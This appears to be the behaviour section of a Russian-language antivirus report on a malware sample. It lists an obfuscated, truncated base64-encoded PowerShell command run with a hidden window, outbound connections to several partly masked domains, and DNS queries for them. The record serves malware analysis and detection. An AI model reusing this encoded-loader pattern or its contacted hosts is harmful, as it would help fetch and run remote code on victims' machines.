Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAHgAMAAyADAAOQA1AGMAMAAzADQANgA9ACcAYwAxADMANAAwADkAMQAwADIANAAwADkAMwAnADsAJABjAGIAMAA1AGIAeAB...
- 'ng####achsan.com':443
- 'ma#####monkeymedia.com':80
- 'at###thai.com':443
- 'fu#####tescolombia.org':443
- 'ng####achsan.com':443
- DNS ASK ng####achsan.com
- DNS ASK li###ao-sa.com
- DNS ASK ma#####monkeymedia.com
- DNS ASK at###thai.com
- DNS ASK fu#####tescolombia.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAHgAMAAyADAAOQA1AGMAMAAzADQANgA9ACcAYwAxADMANAAwADkAMQAwADIANAAwADkAMwAnADsAJABjAGIAMAA1AGIAeAB...' (со скрытым окном)